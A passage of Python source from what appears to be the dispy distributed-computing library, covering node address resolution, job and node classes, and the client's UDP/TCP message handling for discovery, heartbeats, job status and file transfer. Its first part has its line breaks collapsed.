""" node_allocs = [] for node in nodes: if isinstance(node, NodeAllocate): node_allocs.append(node) elif isinstance(node, str): node_allocs.append(NodeAllocate(node)) elif isinstance(node, dict): node_allocs.append(NodeAllocate(node.get('host', '*'), node.get('port', None), node.get('cpus', 0))) elif isinstance(node, tuple): node_allocs.append(NodeAllocate(*node)) elif isinstance(node, list): node_allocs.append(NodeAllocate(*tuple(node))) return [node_alloc for node_alloc in node_allocs if node_alloc.ip_addr] def node_addrinfo(node=None, socket_family=None): if node: try: node = socket.getaddrinfo(node, None)[0] except: return None if not socket_family: socket_family = node[0] elif node[0] != socket_family: node = None if node: node = node[4][0] if not socket_family: socket_family = socket.AF_INET if not socket_family: socket_family = socket.getaddrinfo(socket.gethostname(), None)[0][0] assert socket_family in (socket.AF_INET, socket.AF_INET6) ifn, addrinfo, netmask, broadcast = 0, None, None, None if netifaces: for iface in netifaces.interfaces(): if socket_family == socket.AF_INET: if addrinfo: break elif socket_family == socket.AF_INET6: if ifn and addrinfo: break ifn, addrinfo, netmask = 0, None, None for link in netifaces.ifaddresses(iface).get(socket_family, []): netmask = link.get('netmask', None) broadcast = link.get('broadcast', None) if socket_family == socket.AF_INET: if link.get('broadcast', '').startswith(link['addr'].split('.')[0]): if (not node) or (link['addr'] == node): addrinfo = socket.getaddrinfo(link['addr'], None)[0] break elif socket_family == socket.AF_INET6: if link['addr'].startswith('fe80:'): addr = link['addr'] if '%' not in addr.split(':')[-1]: addr = addr + '%' + interface for addr in socket.getaddrinfo(addr, None): if addr[2] == socket.IPPROTO_TCP: ifn = addr[4][-1] break elif link['addr'].startswith('fd'): for addr in socket.getaddrinfo(link['addr'], None): if addr[2] == socket.IPPROTO_TCP: addrinfo = addr break elif socket_family == 
socket.AF_INET6: logger.warning('IPv6 may not work without "netifaces" package!') if addrinfo: if not node: node = addrinfo[4][0] if not socket_family: socket_family = addrinfo[0] if not node: node = socket.gethostname() addrinfo = socket.getaddrinfo(node, None, socket_family, socket.SOCK_STREAM)[0] ip_addr = addrinfo[4][0] if addrinfo[0] == socket.AF_INET6: # canonicalize so different platforms resolve to same string ip_addr = re.sub(r'^0+', '', ip_addr) ip_addr = re.sub(r':0+', ':', ip_addr) ip_addr = re.sub(r'::+', '::', ip_addr) if not broadcast: broadcast = 'ff05::1' else: if not broadcast: broadcast = '<broadcast>' class AddrInfo(object): def __init__(self, family, ip, ifn, broadcast, netmask): self.family = family self.ip = ip self.ifn = ifn self.broadcast = broadcast self.netmask = netmask self.ext_ip_addr = None addrinfo = AddrInfo(addrinfo[0], _node_ipaddr(addrinfo[4][0]), ifn, broadcast, netmask) return addrinfo # This tuple stores information about partial functions; for # now'setup' and 'cleanup' functions can be partial functions. # TODO: useful to have 'compute' as partial function as well? _Function = collections.namedtuple('_Function', ['name', 'args', 'kwargs']) logger = pycos.Logger('dispy') class _Compute(object): """Internal use only. """ func_type = 1 prog_type = 2 def __init__(self, compute_type, name): assert compute_type == _Compute.func_type or compute_type == _Compute.prog_type self.type = compute_type self.name = name self.id = None self.code = '' self.dest_path = None self.xfer_files = set() self.reentrant = False self.exclusive = True self.setup = None self.cleanup = None self.scheduler_ip_addr = None self.scheduler_port = None self.node_ip_addr = None self.auth = None self.job_result_port = None self.pulse_interval = None def __getstate__(self): state = dict(self.__dict__) return state class _XferFile(object): """Internal use only. 
""" def __init__(self, name, dest_path, compute_id=None): self.name = name self.dest_path = dest_path self.compute_id = compute_id self.stat_buf = os.stat(name) self.sep = os.sep class _Node(object): """Internal use only. """ __slots__ = ['ip_addr', 'port', 'name', 'cpus', 'avail_cpus', 'busy', 'cpu_time', 'clusters', 'auth', 'secret', 'keyfile', 'certfile', 'last_pulse', 'scheduler_ip_addr', '_jobs', 'pending_jobs', 'avail_info', 'platform', 'sock_family'] def __init__(self, ip_addr, port, cpus, sign, secret, platform='', keyfile=None, certfile=None): self.ip_addr = ip_addr if re.match('\d+\.', ip_addr): self.sock_family = socket.AF_INET else: self.sock_family = socket.AF_INET6 self.port = port self.name = None self.cpus = cpus self.avail_cpus = cpus self.busy = 0.0 self.cpu_time = 0.0 self.clusters = set() self.auth = auth_code(secret, sign) self.secret = secret self.keyfile = keyfile self.certfile = certfile self.last_pulse = None self.scheduler_ip_addr = None self.pending_jobs = [] self.avail_info = None self.platform = platform def setup(self, compute, exclusive=True, task=None): # generator compute.scheduler_ip_addr = self.scheduler_ip_addr compute.node_ip_addr = self.ip_addr compute.exclusive = exclusive reply = yield self.send(b'COMPUTE:' + serialize(compute), task=task) try: cpus = deserialize(reply) assert isinstance(cpus, int) and cpus > 0 except: logger.warning('Transfer of computation "%s" to %s failed', compute.name, self.ip_addr) raise StopIteration(-1) if not self.cpus: self.cpus = cpus for xf in compute.xfer_files: resp = yield self.xfer_file(xf, task=task) if resp != 0: logger.error('Could not transfer file "%s"', xf.name) raise StopIteration(resp) if isinstance(compute.setup, _Function): # set bigger timeout in case setup needs to load large files etc. 
resp = yield self.send(b'SETUP:' + serialize(compute.id), timeout=0, task=task) if resp != 0: logger.warning('Setup of computation "%s" on %s failed: %s', compute.name, self.ip_addr, resp) raise StopIteration(resp) self.last_pulse = time.time() raise StopIteration(0) def send(self, msg, reply=True, timeout=MsgTimeout, task=None): # generator sock = socket.socket(self.sock_family, socket.SOCK_STREAM) sock = AsyncSocket(sock, keyfile=self.keyfile, certfile=self.certfile) sock.settimeout(timeout) try: yield sock.connect((self.ip_addr, self.port)) yield sock.sendall(self.auth) yield sock.send_msg(msg) if reply: resp = yield sock.recv_msg() else: resp = 0 except: logger.error('Could not connect to %s:%s, %s', self.ip_addr, self.port, traceback.format_exc()) # TODO: mark this node down, reschedule on different node? resp = traceback.format_exc() finally: sock.close() if resp == b'ACK': resp = 0 raise StopIteration(resp) def xfer_file(self, xf, task=None): # generator sock = socket.socket(self.sock_family, socket.SOCK_STREAM) sock = AsyncSocket(sock, keyfile=self.keyfile, certfile=self.certfile) sock.settimeout(MsgTimeout) try: yield sock.connect((self.ip_addr, self.port)) yield sock.sendall(self.auth) yield sock.send_msg(b'FILEXFER:' + serialize(xf)) recvd = yield sock.recv_msg() recvd = deserialize(recvd) with open(xf.name, 'rb') as fd: sent = 0 while sent == recvd: data = fd.read(1024000) if not data: break yield sock.sendall(data) sent += len(data) recvd = yield sock.recv_msg() recvd = deserialize(recvd) if recvd == xf.stat_buf.st_size: resp = 0 else: resp = -1 except: logger.error('Could not transfer %s to %s', xf.name, self.ip_addr) # TODO: mark this node down, reschedule on different node? 
resp = -1 finally: sock.close() raise StopIteration(resp) def close(self, compute, terminate_pending=False, task=None): # generator logger.debug('Closing node %s for %s / %s', self.ip_addr, compute.name, compute.id) req = {'compute_id': compute.id, 'auth': compute.auth, 'node_ip_addr': self.ip_addr, 'terminate_pending': terminate_pending} try: yield self.send(b'CLOSE:' + serialize(req), reply=True, task=task) except: logger.debug('Deleting computation %s/%s from %s failed', compute.id, compute.name, self.ip_addr) class _DispyJob_(object): """Internal use only. """ __slots__ = ('job', 'uid', 'compute_id', 'hash', 'node', 'pinned', 'xfer_files', '_args', '_kwargs', 'code') def __init__(self, compute_id, args, kwargs): job_deps = kwargs.pop('dispy_job_depends', []) self.job = DispyJob(args, kwargs) self.job._dispy_job_ = self self._args = self.job._args self._kwargs = self.job._kwargs self.uid = None self.compute_id = compute_id self.hash = ''.join(hex(_)[2:] for _ in os.urandom(10)) self.node = None self.pinned = None self.xfer_files = [] self.code = '' depend_ids = set() cwd = os.getcwd() for dep in job_deps: if isinstance(dep, str) or inspect.ismodule(dep): if inspect.ismodule(dep): name = dep.__file__ if name.endswith('.pyc'): name = name[:-1] if not name.endswith('.py'): logger.warning('Invalid module "%s" - must be python source.', dep) continue if name.startswith(cwd): dst = os.path.dirname(name[len(cwd):].lstrip(os.sep)) elif dep.__package__: dst = dep.__package__.replace('.', os.sep) else: dst = os.path.dirname(dep.__name__.replace('.', os.sep)) else: name = os.path.abspath(dep) if name.startswith(cwd): dst = os.path.dirname(name[len(cwd):].lstrip(os.sep)) else: dst = '.' 
if name in depend_ids: continue self.xfer_files.append(_XferFile(name, dst, compute_id)) depend_ids.add(name) elif inspect.isfunction(dep) or inspect.isclass(dep) or hasattr(dep, '__class__'): if inspect.isfunction(dep) or inspect.isclass(dep): pass elif hasattr(dep, '__class__') and inspect.isclass(dep.__class__): dep = dep.__class__ if id(dep) in depend_ids: continue lines = inspect.getsourcelines(dep)[0] lines[0] = lines[0].lstrip() self.code += '\n' + ''.join(lines) depend_ids.add(id(dep)) else: logger.warning('Invalid job depends element "%s"; ignoring it.', dep) def __getstate__(self): state = {'uid': self.uid, 'hash': self.hash, 'compute_id': self.compute_id, '_args': self._args if isinstance(self._args, bytes) else serialize(self._args), '_kwargs': self._kwargs if isinstance(self._kwargs, bytes) else serialize(self._kwargs), 'xfer_files': self.xfer_files, 'code': self.code} return state def __setstate__(self, state): for k, v in state.items(): setattr(self, k, v) def __lt__(self, other): return self.uid < other.uid def __eq__(self, other): return isinstance(other, _DispyJob_) and self.uid == other.uid def run(self, task=None): # generator logger.debug('Running job %s on %s', self.uid, self.node.ip_addr) self.job.start_time = time.time() for xf in self.xfer_files: resp = yield self.node.xfer_file(xf, task=task) if resp: logger.warning('Transfer of file "%s" to %s failed', xf.name, self.node.ip_addr) raise Exception(-1) resp = yield self.node.send(b'JOB:' + serialize(self), task=task) # TODO: deal with NAKs (reschedule?) if resp != 0: logger.warning('Failed to run %s on %s: %s', self.uid, self.node.ip_addr, resp) raise Exception(str(resp)) raise StopIteration(resp) def finish(self, status): job = self.job job.status = status if status != DispyJob.ProvisionalResult: self.job._dispy_job_ = None self.job = None job.finish.set() class _JobReply(object): """Internal use only. 
""" def __init__(self, _job, ip_addr, status=None, keyfile=None, certfile=None): self.uid = _job.uid self.hash = _job.hash self.ip_addr = ip_addr self.status = status self.result = None self.stdout = None self.stderr = None self.exception = None self.start_time = 0 self.end_time = 0 class _Cluster(object, metaclass=Singleton): """Internal use only. """ _instance = None def __init__(self, ip_addr=None, ext_ip_addr=None, port=None, node_port=None, shared=False, secret='', keyfile=None, certfile=None, recover_file=None): if not hasattr(self, 'pycos'): self.pycos = Pycos() logger.info('dispy client version: %s', __version__) self.addrinfos = {} if isinstance(ip_addr, list): ip_addrs = ip_addr else: ip_addrs = [ip_addr] if isinstance(ext_ip_addr, list): ext_ip_addrs = ext_ip_addr else: ext_ip_addrs = [ext_ip_addr] for i in range(len(ip_addrs)): ip_addr = ip_addrs[i] if i < len(ext_ip_addrs): ext_ip_addr = ext_ip_addrs[i] else: ext_ip_addr = None addrinfo = node_addrinfo(ip_addr) if not addrinfo: logger.warning('Ignoring invalid ip_addr %s', ip_addr) continue if ext_ip_addr: ext_ip_addr = node_addrinfo(ext_ip_addr) if ext_ip_addr: ext_ip_addr = ext_ip_addr.ip else: logger.warning('Ignoring invalid ext_ip_addr %s', ext_ip_addrs[i]) if not ext_ip_addr: ext_ip_addr = addrinfo.ip addrinfo.ext_ip_addr = ext_ip_addr self.addrinfos[addrinfo.ext_ip_addr] = addrinfo if not self.addrinfos: raise Exception('No valid IP address found') if port: port = int(port) else: if shared: port = 0 else: port = 51347 self.port = port if node_port: node_port = int(node_port) else: node_port = 51348 self.node_port = node_port self._nodes = {} self.secret = secret self.keyfile = keyfile self.certfile = certfile self.shared = shared self.pulse_interval = None self.ping_interval = None self.poll_interval = None self.dest_path = os.getcwd() # TODO: make it an option? 
self._clusters = {} self._sched_jobs = {} self._sched_event = pycos.Event() self.terminate = False self.sign = hashlib.sha1(os.urandom(20)) for ext_ip_addr in self.addrinfos: self.sign.update(ext_ip_addr.encode()) self.sign = self.sign.hexdigest() self.auth = auth_code(self.secret, self.sign) if isinstance(recover_file, str): self.recover_file = recover_file else: now = datetime.datetime.now() self.recover_file = '_dispy_%.4i%.2i%.2i%.2i%.2i%.2i' % \ (now.year, now.month, now.day, now.hour, now.minute, now.second) atexit.register(self.shutdown) self.timer_task = Task(self.timer_proc) try: self.shelf = shelve.open(self.recover_file, flag='c', writeback=True) self.shelf['_cluster'] = {'ip_addrs': ip_addrs, 'ext_ip_addrs': ext_ip_addrs, 'port': self.port, 'sign': self.sign, 'secret': self.secret, 'auth': self.auth, 'keyfile': self.keyfile, 'certfile': self.certfile} self.shelf.sync() except: raise Exception('Could not create fault recover file "%s"' % self.recover_file) logger.info('Storing fault recovery information in "%s"', self.recover_file) self.select_job_node = self.load_balance_schedule self._scheduler = Task(self._schedule_jobs) self.start_time = time.time() self.compute_id = int(1000 * self.start_time) self.worker_Q = queue.Queue() self.worker_thread = threading.Thread(target=self.worker) self.worker_thread.daemon = True self.worker_thread.start() if self.shared: port_bound_event = None else: port_bound_event = pycos.Event() self.tcp_tasks = [] self.udp_tasks = [] for addrinfo in self.addrinfos.values(): self.tcp_tasks.append(Task(self.tcp_server, addrinfo, port_bound_event)) if self.shared: continue if os.name == 'nt': # Windows does not allow binding to a broadcast address bind_addr = addrinfo.ip else: if addrinfo.broadcast == '<broadcast>': # or addrinfo.broadcast == 'ff05::1' bind_addr = '' else: bind_addr = addrinfo.broadcast self.udp_tasks.append(Task(self.udp_server, bind_addr, addrinfo, port_bound_event)) # Under Windows dispynode may send objects 
with # '__mp_main__' scope, so make an alias to '__main__'. # TODO: Make alias even if client is not Windows? It is # possible the client is not Windows, but a node is. if os.name == 'nt' and '__mp_main__' not in sys.modules: sys.modules['__mp_main__'] = sys.modules['__main__'] def udp_server(self, bind_addr, addrinfo, port_bound_event, task=None): # generator task.set_daemon() udp_sock = AsyncSocket(socket.socket(addrinfo.family, socket.SOCK_DGRAM)) # udp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) if addrinfo.family == socket.AF_INET6: mreq = socket.inet_pton(addrinfo.family, addrinfo.broadcast) mreq += struct.pack('@I', addrinfo.ifn) udp_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq) while 1: try: udp_sock.bind((bind_addr, self.port)) except socket.error as exc: if exc.errno == errno.EADDRINUSE: logger.warning('Port %s seems to be used by another program ...', self.port) else: logger.warning('Error binding to port %s: %s ...', self.port, exc.errno) yield task.sleep(5) except: logger.warning('Could not bind to port %s: %s', self.port, traceback.format_exc()) yield task.sleep(5) else: break if addrinfo.family == socket.AF_INET6: try: udp_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1) except: pass port_bound_event.set() del port_bound_event while 1: try: msg, addr = yield udp_sock.recvfrom(1000) except GeneratorExit: break if msg.startswith(b'PING:'): try: info = deserialize(msg[len(b'PING:'):]) if info['version'] != _dispy_version: logger.warning('Ignoring %s due to version mismatch', addr[0]) continue assert info['port'] > 0 assert info['ip_addr'] # socket.inet_aton(status['ip_addr']) except: # logger.debug(traceback.format_exc()) logger.debug('Ignoring node %s', addr[0]) continue auth = auth_code(self.secret, info['sign']) node = self._nodes.get(info['ip_addr'], None) if node and node.auth == auth: continue sock = AsyncSocket(socket.socket(addrinfo.family, socket.SOCK_STREAM), keyfile=self.keyfile, 
                                   certfile=self.certfile)
                sock.settimeout(MsgTimeout)
                msg = {'version': _dispy_version, 'port': self.port, 'sign': self.sign,
                       'node_ip_addr': info['ip_addr']}
                msg['ip_addrs'] = [ai.ext_ip_addr for ai in self.addrinfos.values()]
                try:
                    yield sock.connect((info['ip_addr'], info['port']))
                    yield sock.sendall(auth)
                    yield sock.send_msg(b'PING:' + serialize(msg))
                except GeneratorExit:
                    break
                except:
                    logger.debug(traceback.format_exc())
                finally:
                    sock.close()
            else:
                # not a PING message; ignore
                pass
        udp_sock.close()

    def tcp_server(self, addrinfo, port_bound_event, task=None):  # generator
        """Accept TCP connections from nodes/scheduler; each accepted connection
        is handled by a separate tcp_req task.
        """
        task.set_daemon()
        if port_bound_event:
            # wait until udp_server has bound the port (non-shared case)
            yield port_bound_event.wait()
        del port_bound_event
        sock = AsyncSocket(socket.socket(addrinfo.family, socket.SOCK_STREAM),
                           keyfile=self.keyfile, certfile=self.certfile)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            sock.bind((addrinfo.ip, self.port))
        except:
            logger.warning('Could not bind TCP server to %s:%s', addrinfo.ip, self.port)
            raise StopIteration
        if not self.port:
            # port 0 was requested: record the OS-assigned port
            self.port = sock.getsockname()[1]
        logger.debug('dispy client at %s:%s', addrinfo.ip, self.port)
        sock.listen(128)
        if not self.shared:
            Task(self.broadcast_ping, [addrinfo])
        while 1:
            try:
                conn, addr = yield sock.accept()
            except ssl.SSLError as err:
                logger.debug('SSL connection failed: %s', str(err))
                continue
            except GeneratorExit:
                break
            except:
                logger.debug(traceback.format_exc())
                continue
            Task(self.tcp_req, conn, addr)
        sock.close()

    def tcp_req(self, conn, addr, task=None):  # generator
        """Dispatch one TCP request from a node or dispyscheduler.

        The message prefix selects the handler: JOB_REPLY (job result), PULSE
        (node heartbeat), JOB_STATUS / NODE_STATUS / SCHEDULED (from
        dispyscheduler), PONG / PING (node discovery), FILEXFER (result file
        transfer), NODE_CPUS (cpu count change), TERMINATED (node shutdown).
        """
        conn.settimeout(MsgTimeout)
        msg = yield conn.recv_msg()
        if msg.startswith(b'JOB_REPLY:'):
            try:
                info = deserialize(msg[len(b'JOB_REPLY:'):])
            except:
                logger.warning('Invalid job reply from %s:%s ignored', addr[0], addr[1])
            else:
                yield self.job_reply_process(info, conn, addr)
            conn.close()
        elif msg.startswith(b'PULSE:'):
            msg = msg[len(b'PULSE:'):]
            try:
                info = deserialize(msg)
                node = self._nodes[info['ip_addr']]
                assert 0 <= info['cpus'] <= node.cpus
                node.last_pulse = time.time()
                yield conn.send_msg(b'PULSE')
                if info['avail_info']:
                    # propagate availability info to every cluster using this node
                    node.avail_info = info['avail_info']
                    for cid in node.clusters:
                        cluster = self._clusters[cid]
                        if cluster.status_callback:
                            dispy_node = cluster._dispy_nodes.get(node.ip_addr, None)
                            if not dispy_node:
                                continue
                            dispy_node.avail_info = info['avail_info']
                            dispy_node.update_time = node.last_pulse
                            self.worker_Q.put((cluster.status_callback,
                                               (DispyNode.AvailInfo, dispy_node, None)))
            except:
                logger.warning('Ignoring pulse message from %s', addr[0])
                # logger.debug(traceback.format_exc())
            conn.close()
        elif msg.startswith(b'JOB_STATUS:'):
            conn.close()
            # message from dispyscheduler
            try:
                info = deserialize(msg[len(b'JOB_STATUS:'):])
                _job = self._sched_jobs[info['uid']]
                assert _job.hash == info['hash']
            except:
                logger.warning('Invalid job status from %s:%s ignored', addr[0], addr[1])
            else:
                job = _job.job
                job.status = info['status']
                job.ip_addr = info['node']
                node = self._nodes.get(job.ip_addr, None)
                # TODO: if node is None, likely missed NODE_STATUS, so create it now?
                if node:
                    if job.status == DispyJob.Running:
                        job.start_time = info['start_time']
                        node.busy += 1
                    else:
                        logger.warning('Invalid job status for shared cluster: %s', job.status)
                    cluster = self._clusters.get(_job.compute_id, None)
                    if cluster:
                        dispy_node = cluster._dispy_nodes.get(node.ip_addr, None)
                        if dispy_node:
                            if job.status == DispyJob.Running:
                                dispy_node.busy += 1
                            dispy_node.update_time = time.time()
                            if cluster.status_callback:
                                self.worker_Q.put((cluster.status_callback,
                                                   (job.status, dispy_node, job)))
        elif msg.startswith(b'PONG:'):
            conn.close()
            try:
                info = deserialize(msg[len(b'PONG:'):])
                if info['version'] != _dispy_version:
                    logger.warning('Ignoring node %s due to version mismatch: %s != %s',
                                   info['ip_addr'], info['version'], _dispy_version)
                    raise StopIteration
                assert info['auth'] == self.auth
            except (AssertionError):
                logger.warning('Ignoring node %s ("secret" mismatch)', addr[0])
            except (Exception) as err:
                logger.warning('Ignoring node %s (%s: %s)',
                               addr[0], err.__class__.__name__, err)
            else:
                self.add_node(info)
        elif msg.startswith(b'PING:'):
            sock_family = conn.family
            conn.close()
            try:
                info = deserialize(msg[len(b'PING:'):])
                if info['version'] != _dispy_version:
                    logger.warning('Ignoring %s due to version mismatch', addr[0])
                    raise StopIteration
                assert info['port'] > 0
                assert info['ip_addr']
                # socket.inet_aton(status['ip_addr'])
            except:
                # logger.debug(traceback.format_exc())
                logger.debug('Ignoring node %s', addr[0])
                raise StopIteration
            auth = auth_code(self.secret, info['sign'])
            node = self._nodes.get(info['ip_addr'], None)
            if node:
                if node.auth == auth:
                    # known node, nothing changed
                    raise StopIteration
            # reply with our own PING so the node registers with this client
            sock = AsyncSocket(socket.socket(sock_family, socket.SOCK_STREAM),
                               keyfile=self.keyfile, certfile=self.certfile)
            sock.settimeout(MsgTimeout)
            msg = {'version': _dispy_version, 'port': self.port, 'sign': self.sign,
                   'node_ip_addr': info['ip_addr']}
            msg['ip_addrs'] = [addrinfo.ext_ip_addr for addrinfo in self.addrinfos.values()]
            try:
                yield sock.connect((info['ip_addr'], info['port']))
                yield sock.sendall(auth)
                yield sock.send_msg(b'PING:' + serialize(msg))
            except:
                logger.debug(traceback.format_exc())
            finally:
                sock.close()
        elif msg.startswith(b'FILEXFER:'):
            try:
                xf = deserialize(msg[len(b'FILEXFER:'):])
                msg = yield conn.recv_msg()
                job_reply = deserialize(msg)
            except:
                logger.debug(traceback.format_exc())
            else:
                yield self.file_xfer_process(job_reply, xf, conn, addr)
            conn.close()
        elif msg.startswith(b'NODE_CPUS:'):
            conn.close()
            try:
                info = deserialize(msg[len(b'NODE_CPUS:'):])
                node = self._nodes.get(info['ip_addr'], None)
                if not node:
                    raise StopIteration
                auth = auth_code(self.secret, info['sign'])
                if auth != node.auth:
                    logger.warning('Invalid signature from %s', node.ip_addr)
                    raise StopIteration
                cpus = info['cpus']
            except:
                raise StopIteration
            if cpus < 0:
                logger.warning('Node requested using %s CPUs, disabling it',
                               node.ip_addr, cpus)
                cpus = 0
            logger.debug('Setting cpus for %s to %s', node.ip_addr, cpus)
            # TODO: set node.cpus to min(cpus, node.cpus)?
            node.cpus = cpus
            if cpus > node.avail_cpus:
                # node grew: see whether existing clusters can now use it
                node.avail_cpus = cpus
                node_computations = []
                for cid, cluster in self._clusters.items():
                    if cid in node.clusters:
                        continue
                    compute = cluster._compute
                    for node_alloc in cluster._node_allocs:
                        cpus = node_alloc.allocate(cluster, node.ip_addr, node.name,
                                                   node.avail_cpus,
                                                   avail_info=node.avail_info,
                                                   platform=node.platform)
                        if cpus <= 0:
                            continue
                        node.cpus = min(node.avail_cpus, cpus)
                        node_computations.append(compute)
                        break
                if node_computations:
                    Task(self.setup_node, node, node_computations)
                    yield self._sched_event.set()
            else:
                node.avail_cpus = cpus
            for cid in node.clusters:
                cluster = self._clusters[cid]
                dispy_node = cluster._dispy_nodes.get(node.ip_addr, None)
                if dispy_node:
                    dispy_node.cpus = cpus
        elif msg.startswith(b'TERMINATED:'):
            conn.close()
            try:
                info = deserialize(msg[len(b'TERMINATED:'):])
            except:
                # logger.debug(traceback.format_exc())
                pass
            else:
                node = self._nodes.pop(info['ip_addr'], None)
                if not node:
                    raise StopIteration
                auth = auth_code(self.secret, info['sign'])
                if auth != node.auth:
                    logger.warning('Invalid signature from %s', node.ip_addr)
                    raise StopIteration
                logger.debug('Removing node %s', node.ip_addr)
                if node.clusters:
                    # collect jobs scheduled on the dead node to reschedule them
                    dead_jobs = [_job for _job in self._sched_jobs.values()
                                 if _job.node is not None and
                                 _job.node.ip_addr == node.ip_addr]
                    cids = list(node.clusters)
                    node.clusters = set()
                    for cid in cids:
                        cluster = self._clusters.get(cid, None)
                        if not cluster:
                            continue
                        dispy_node = cluster._dispy_nodes.pop(node.ip_addr, None)
                        if not dispy_node:
                            continue
                        dispy_node.avail_cpus = dispy_node.cpus = dispy_node.busy = 0
                        if cluster.status_callback:
                            self.worker_Q.put((cluster.status_callback,
                                               (DispyNode.Closed, dispy_node, None)))
                    self.reschedule_jobs(dead_jobs)
        elif msg.startswith(b'NODE_STATUS:'):
            conn.close()
            # this message is from dispyscheduler for SharedJobCluster
            try:
                info = deserialize(msg[len(b'NODE_STATUS:'):])
                cluster = self._clusters[info['compute_id']]
                assert info['auth'] == cluster._compute.auth
            except:
                logger.debug('Invalid node status from %s:%s ignored', addr[0], addr[1])
                # logger.debug(traceback.format_exc())
            else:
                if info['status'] == DispyNode.AvailInfo:
                    dispy_node = cluster._dispy_nodes.get(info['ip_addr'], None)
                    if dispy_node:
                        dispy_node.avail_info = info['avail_info']
                        if cluster.status_callback:
                            self.worker_Q.put((cluster.status_callback,
                                               (DispyNode.AvailInfo, dispy_node, None)))
                elif info['status'] == DispyNode.Initialized:
                    dispy_node = info['dispy_node']
                    dispy_node.update_time = time.time()
                    node = self._nodes.get(dispy_node.ip_addr, None)
                    if node:
                        node.name = dispy_node.name
                        node.cpus = dispy_node.cpus
                    else:
                        # node not seen before: create a placeholder record
                        node = _Node(dispy_node.ip_addr, 0, dispy_node.cpus, '', '',
                                     platform='')
                        node.name = dispy_node.name
                        self._nodes[node.ip_addr] = node
                    cluster._dispy_nodes[dispy_node.ip_addr] = dispy_node
                    if cluster.status_callback:
                        self.worker_Q.put((cluster.status_callback,
                                           (DispyNode.Initialized, dispy_node, None)))
                elif info['status'] == DispyNode.Closed:
                    dispy_node = cluster._dispy_nodes.get(info['ip_addr'], None)
                    if dispy_node:
                        dispy_node.avail_cpus = dispy_node.cpus = 0
                        if cluster.status_callback:
                            self.worker_Q.put((cluster.status_callback,
                                               (DispyNode.Closed, dispy_node, None)))
                else:
                    logger.warning('Invalid node status %s from %s:%s ignored',
                                   info['status'], addr[0], addr[1])
        elif msg.startswith(b'SCHEDULED:'):
            # dispyscheduler accepted this computation; record its pulse interval
            try:
                info = deserialize(msg[len(b'SCHEDULED:'):])
                assert self.shared
                cluster = self._clusters.get(info['compute_id'], None)
                assert info['pulse_interval'] is None or info['pulse_interval'] >= 1
                self.pulse_interval = info['pulse_interval']
                self.timer_task.resume(True)
                yield conn.send_msg(b'ACK')
                cluster._scheduled_event.set()
            except:
                yield conn.send_msg(b'NAK')
            conn.close()
        else:
            logger.warning('Invalid message from %s:%s ignored', addr[0], addr[1])
            # logger.debug(traceback.format_exc())
            conn.close()

    def timer_proc(self, task=None):
        """Periodic housekeeping: send pulses (shared case) or detect dead nodes
        (own scheduler), re-ping clusters and poll for pending job results.

        The task sleeps for the smallest of the configured intervals; resuming
        it with a truthy value recomputes the timeout.
        """
        task.set_daemon()
        reset = True
        last_pulse_time = last_ping_time = last_poll_time = time.time()
        timeout = None
        while 1:
            if reset:
                timeout = num_min(self.pulse_interval, self.ping_interval,
                                  self.poll_interval)
            try:
                reset = yield task.suspend(timeout)
            except GeneratorExit:
                break
            if reset:
                # intervals changed; recompute timeout before doing any work
                continue
            now = time.time()
            if self.pulse_interval and (now - last_pulse_time) >= self.pulse_interval:
                last_pulse_time = now
                if self.shared:
                    # tell dispyscheduler this client is alive
                    clusters = list(self._clusters.values())
                    for cluster in clusters:
                        msg = {'client_ip_addr': cluster._compute.scheduler_ip_addr,
                               'client_port': cluster._compute.job_result_port}
                        sock = socket.socket(cluster.addrinfo.family, socket.SOCK_STREAM)
                        sock = AsyncSocket(sock, keyfile=self.keyfile,
                                           certfile=self.certfile)
                        sock.settimeout(MsgTimeout)
                        try:
                            yield sock.connect((cluster.scheduler_ip_addr,
                                                cluster.scheduler_port))
                            yield sock.sendall(cluster._scheduler_auth)
                            yield sock.send_msg(b'PULSE:' + serialize(msg))
                        except:
                            pass
                        sock.close()
                else:
                    # a busy node that missed 5 pulse intervals is considered dead
                    dead_nodes = {}
                    for node in self._nodes.values():
                        if node.busy and node.last_pulse is not None and \
                           (node.last_pulse + (5 * self.pulse_interval)) <= now:
                            logger.warning('Node %s is not responding; '
                                           'removing it (%s, %s, %s)',
                                           node.ip_addr, node.busy, node.last_pulse, now)
                            dead_nodes[node.ip_addr] = node
                    if dead_nodes:
                        for node in dead_nodes.values():
                            cids = list(node.clusters)
                            node.clusters = set()
                            for cid in cids:
                                cluster = self._clusters.get(cid, None)
                                if not cluster:
                                    continue
                                dispy_node = cluster._dispy_nodes.pop(node.ip_addr, None)
                                if not dispy_node:
                                    continue
                                dispy_node.avail_cpus = dispy_node.cpus = \
                                    dispy_node.busy = 0
                                if cluster.status_callback:
                                    self.worker_Q.put((cluster.status_callback,
                                                       (DispyNode.Closed, dispy_node,
                                                        None)))
                            del self._nodes[node.ip_addr]
                        dead_jobs = [_job for _job in self._sched_jobs.values()
                                     if _job.node is not None and
                                     _job.node.ip_addr in dead_nodes]
                        self.reschedule_jobs(dead_jobs)
            if self.ping_interval and (now - last_ping_time) >= self.ping_interval:
                last_ping_time = now
                for cluster in self._clusters.values():
                    self.send_ping_cluster(cluster)
            if self.poll_interval and (now - last_poll_time) >= self.poll_interval:
                last_poll_time = now
                for cluster in self._clusters.values():
                    Task(self.poll_job_results, cluster)

    def file_xfer_process(self, job_reply, xf, sock, addr):
        """Receive one result file (xf) for a scheduled job over 'sock'.

        Protocol: repeatedly send the number of bytes received so far and read
        the next chunk until the expected size (xf.stat_buf.st_size) arrives.
        """
        _job = self._sched_jobs.get(job_reply.uid, None)
        if _job is None or _job.hash != job_reply.hash:
            logger.warning('Ignoring invalid file transfer from job %s at %s',
                           job_reply.uid, addr[0])
            yield sock.send_msg(serialize(-1))
            raise StopIteration
        node = self._nodes.get(job_reply.ip_addr, None)
        if node:
            node.last_pulse = time.time()
        tgt = os.path.join(self.dest_path, xf.dest_path.replace(xf.sep, os.sep),
                           xf.name.split(xf.sep)[-1])
        if not os.path.isdir(os.path.dirname(tgt)):
            os.makedirs(os.path.dirname(tgt))
        with open(tgt, 'wb') as fd:
            recvd = 0
            while recvd < xf.stat_buf.st_size:
                # ack progress; node sends the next chunk (at most 1000000 bytes)
                yield sock.send_msg(serialize(recvd))
